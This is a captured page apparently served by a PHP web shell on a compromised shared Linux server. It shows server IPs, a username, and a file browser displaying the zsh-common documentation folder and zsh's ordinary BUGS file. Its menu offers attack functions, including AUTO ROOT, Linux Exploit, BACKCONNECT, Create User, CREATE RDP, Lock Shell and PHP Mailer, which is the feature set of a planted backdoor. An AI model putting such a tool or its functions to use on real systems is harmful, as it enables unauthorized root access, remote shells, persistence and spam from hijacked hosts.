Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
zsh-common /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-xr-x
BUGS
1.84
KB
-rw-r--r--
CONTRIBUTORS.gz
5.46
KB
-rw-r--r--
ChangeLog-3.0.gz
48.16
KB
-rw-r--r--
ChangeLog-3.1.gz
143.3
KB
-rw-r--r--
ChangeLog-4.1.gz
51.19
KB
-rw-r--r--
ChangeLog-4.3.gz
147.28
KB
-rw-r--r--
FAQ.gz
39.48
KB
-rw-r--r--
FEATURES.gz
2.51
KB
-rw-r--r--
FTP-README
1.58
KB
-rw-r--r--
MACHINES
671
B
-rw-r--r--
META-FAQ
3.27
KB
-rw-r--r--
NEWS.Debian.gz
1.74
KB
-rw-r--r--
NEWS.gz
23.82
KB
-rw-r--r--
README.Debian
3.53
KB
-rw-r--r--
README.gz
13.12
KB
-rw-r--r--
README.zftp
291
B
-rw-r--r--
TODO
148
B
-rw-r--r--
changelog.Debian.gz
3.58
KB
-rw-r--r--
completion-style-guide.gz
8.64
KB
-rw-r--r--
copyright
6.81
KB
-rw-r--r--
zsh-development-guide.gz
14.69
KB
-rw-r--r--
zsh.texi.gz
428.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : BUGS
----------------- KNOWN BUGS IN ZSH ----------------- ------------------------------------------------------------------------ The pattern %?* matches names beginning with %? instead of names with at least two characters beginning with %. This is a hack to allow %?foo job substitution without quoting. This behaviour is incompatible with sh and ksh and may be removed in the future. A good fix would be to keep such patterns unchanged if they do not match regardless of the state of the nonomatch and nullglob options. ------------------------------------------------------------------------ It is currently impossible to time builtins. ------------------------------------------------------------------------ 40106: The comp* completion-related builtins (compadd, compset, etc) are run with $_comp_options in effect, rather than the user's options. ------------------------------------------------------------------------ users/20807: vcs_info quilt 'addon' mode: hook lookup context specifies the underlying VCS but not whether quilt is used. Workaround: test (( ${+funcstack[(r)VCS_INFO_quilt]} )). ------------------------------------------------------------------------ 41184: 'exec' optimization for last command in a subshell should be skipped when STTY=... is set for that command ------------------------------------------------------------------------ 41203 and others: Make it easier to maintain C modules out of tree. (May require defining a stable API for modules, see 41254) ------------------------------------------------------------------------ 44007 - Martijn - exit in trap executes rest of function See test case in Test/C03traps.ztst. ------------------------------------------------------------------------ 45282: ${${:-foo}:P} where foo is a symlink that points to itself segfaults ------------------------------------------------------------------------
Close